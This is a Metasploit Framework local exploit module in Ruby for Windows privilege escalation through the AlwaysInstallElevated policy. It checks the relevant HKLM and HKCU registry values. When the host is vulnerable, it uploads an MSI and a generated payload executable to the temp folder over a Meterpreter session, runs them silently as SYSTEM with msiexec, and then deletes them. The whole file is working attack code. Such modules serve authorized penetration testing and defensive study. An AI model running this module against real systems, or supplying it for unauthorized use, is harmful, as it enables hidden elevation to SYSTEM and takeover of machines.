## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::EXE include Msf::Post::Windows::Registry def initialize(info={}) super(update_info(info, { 'Name' => 'Windows AlwaysInstallElevated MSI', 'Description' => %q{ This module checks the AlwaysInstallElevated registry keys which dictate if .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM). The default MSI file is data/post/exec_payload.msi with the WiX source file under data/post/exec_payload_source/. This MSI simply executes payload.exe within the same folder. The MSI may not execute succesfully successive times. MSI can be rebuilt from the source using the WIX tool with the following commands: candle exec_payload.wxs light exec_payload.wixobj Source: external/source/exploits/exec_payload_msi/exec_payload.wxs }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell', 'Parvez Anwar' # discovery ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows', { } ], ], 'References' => [ [ 'URL', 'http://www.greyhathacker.net/?p=185' ], [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ], [ 'URL', 'http://wix.sourceforge.net'] , ], 'DisclosureDate'=> 'Mar 18 2010', 'DefaultTarget' => 0 })) register_advanced_options([ OptString.new('LOG_FILE', [false, 'Path to output MSI log file to.', nil]), ], self.class) end def check install_elevated = "AlwaysInstallElevated" installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer" hkcu = "HKEY_CURRENT_USER\\#{installer}" hklm = "HKEY_LOCAL_MACHINE\\#{installer}" local_machine_value = registry_getvaldata(hklm,install_elevated) if local_machine_value.nil? print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif local_machine_value == 0 print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.") return Msf::Exploit::CheckCode::Safe else print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") current_user_value = registry_getvaldata(hkcu,install_elevated) if current_user_value.nil? print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif current_user_value == 0 print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Safe else print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Vulnerable end end end def cleanup if @executed begin print_status("Deleting MSI...") session.fs.file.delete(@msi_destination) rescue Rex::Post::Meterpreter::RequestError => e print_error(e.to_s) end begin print_status("Deleting Payload...") session.fs.file.delete(@payload_destination) rescue Rex::Post::Meterpreter::RequestError => e print_error(e.to_s) end end end def exploit @executed = false if check == Msf::Exploit::CheckCode::Vulnerable @executed = true msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi" msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi") # Upload MSI @msi_destination = "#{session.fs.file.expand_path("%TEMP%")}\\#{msi_filename}" print_status("Uploading the MSI to #{@msi_destination} ...") session.fs.file.upload_file(@msi_destination, msi_source) # Upload payload payload = generate_payload_exe @payload_destination = "#{session.fs.file.expand_path("%TEMP%")}\\payload.exe" print_status("Uploading the Payload to #{@payload_destination} ...") fd = client.fs.file.new(@payload_destination, "wb") fd.write(payload) fd.close # Execute MSI print_status("Executing MSI...") if datastore['LOG_FILE'].nil? logging = "" else logging = "/l* #{datastore['LOG_FILE']} " end cmd = "msiexec.exe #{logging}/quiet /passive /n /package #{@msi_destination}" vprint_status(cmd) session.sys.process.execute(cmd, nil, {'Hidden' => true}) end end end